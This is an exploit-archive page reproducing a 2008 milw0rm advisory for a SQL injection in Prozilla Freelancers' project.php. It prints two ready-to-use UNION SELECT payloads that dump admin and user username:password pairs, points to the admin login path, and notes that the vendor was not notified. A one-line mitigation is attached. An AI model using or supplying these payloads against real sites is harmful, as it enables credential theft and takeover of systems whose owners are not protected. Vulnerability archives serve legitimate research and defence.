header-logo
Suggest Exploit
vendor:
Freelancers
by:
t0pP8uZz
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Freelancers
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

Prozilla Freelancers SQL Injection Vulnerabilitys

Prozilla freelancers is vulnerable due to a insecure mysql query. This allows the remote attacker to pull admin/user credentials from the database and possibly gain shell access.

Mitigation:

Ensure that user input is properly sanitized and validated before being used in a SQL query.
Source

Exploit-DB raw data:

--==+================================================================================+==--
--==+		     Prozilla Freelancers SQL Injection Vulnerabilitys	             +==--
--==+================================================================================+==--



Discovered By: t0pP8uZz
Discovered On: 7 April 2008
Script Download: http://prozilla.net
DORK: N/A

Vendor Has Not Been Notified!


DESCRIPTION: 
Prozilla freelancers is vulnerable due to a insecure mysql query.
this allows the remote attacker to pull admin/user credntials from database.
and possibly gain shell.


SQL Injection:
ADMIN: project.php?project=-1/**/UNION/**/ALL/**/SELECT/**/1,2,3,4,5,6,7,8,9,CONCAT(username,0x3a,password),11,12,13,14,15/**/FROM/**/admin/*
USERS: project.php?project=-1/**/UNION/**/ALL/**/SELECT/**/1,2,3,4,5,6,7,8,9,CONCAT(username,0x3a,password),11,12,13,14,15/**/FROM/**/users/**/LIMIT/**/0,1/*


NOTE/TIP: 
admin login is at /siteadmin/


GREETZ: milw0rm.com, h4ck-y0u.org, CipherCrew !



--==+================================================================================+==--
--==+		     Prozilla Freelancers SQL Injection Vulnerabilitys	             +==--
--==+================================================================================+==--

# milw0rm.com [2008-04-07]